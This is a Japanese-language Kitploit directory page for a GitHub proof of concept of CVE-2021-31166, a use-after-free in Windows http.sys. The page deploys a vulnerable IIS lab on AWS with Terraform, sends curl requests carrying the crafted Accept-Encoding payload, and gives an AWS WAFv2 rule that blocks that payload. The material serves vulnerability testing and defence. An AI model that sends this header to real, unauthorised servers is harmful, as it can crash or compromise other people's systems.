Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
WIn-CVE-2021-31166 — CVE-2021-31166(http.sys RCE)的概念验证,包含在 AWS 上使用 Terraform 进行部署,以及测试脚本和用于阻止该漏洞利用的 WAFv2 规则。 | Kitploit
ツール/GitHubGitHub/bgsilvait/win-cve-2021-31166
脆弱性分析エクスプロイトIDS/IPS回避ウェブセキュリティクラウドセキュリティDevSecOps
GitHubbgsilvait/win-cve-2021-31166

WIn-CVE-2021-31166

CVE-2021-31166(http.sys RCE)的概念验证,包含在 AWS 上使用 Terraform 进行部署,以及测试脚本和用于阻止该漏洞利用的 WAFv2 规则。

リポジトリを見る
25年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WIn-CVE-2021-31166

このリポジトリは、0vercl0k の CVE-2021-31166(「HTTP プロトコルスタックのリモートコード実行の脆弱性」)の概念実証にインスパイアされています。これは、http.sys における use-after-free の逆参照で、Microsoft が 2021 年 5 月に修正しました。

ビルドインフラストラクチャ

root@kitploit:~
git clone https://github.com/bgsilvait/WIn-CVE-2021-31166.git
cd WIn-CVE-2021-31166
terraform init
terraform plan
terraform apply --auto-approve

Terraform は Windows Server Core 20H2 を使用した EC2 インスタンスを作成し、IIS をインストールし、SSM の権限を追加して AWS コンソールから Web Powershell セッションを開けるようにします。また、Application Load Balancer を作成し、そのインスタンスをターゲットとして使用します。デフォルトでは、Security Group は でのアクセスを許可するために のみを追加します。

HTTP
あなたの IP

値の取得

root@kitploit:~
#Define Values from Terraform Output
ALB=$(terraform output -raw lb_dns_name)
EC2IP=$(terraform output -json public_ip | jq -r '.[0]')

接続のテスト

root@kitploit:~
#Testing to ALB
while true; do curl -I $ALB --connect-timeout 1 ; done

#Testing Directly to EC2'
while true; do curl -I $EC2IP --connect-timeout 1 ; done

CVE ヘッダーの注入

root@kitploit:~
#Testing to ALB
curl -i $ALB -H "Accept-Encoding: doar-e, ftw, imo, ,"

#Testing Directly to EC2'
curl -i $EC2IP -H "Accept-Encoding: doar-e, ftw, imo, ,"

AWS WAFv2 のブロックルール

root@kitploit:~
{
  "Name": "cve-block",
  "Priority": 0,
  "Statement": {
    "ByteMatchStatement": {
      "SearchString": "doar-e, ftw, imo, ,",
      "FieldToMatch": {
        "SingleHeader": {
          "Name": "accept-encoding"
        }
      },
      "TextTransformations": [
        {
          "Priority": 0,
          "Type": "NONE"
        }
      ],
      "PositionalConstraint": "EXACTLY"
    }
  },
  "Action": {
    "Block": {
      "CustomResponse": {
        "ResponseCode": 418,
        "CustomResponseBodyKey": "418"
      }
    }
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "cve-block"
  }
}
ツールをダウンロード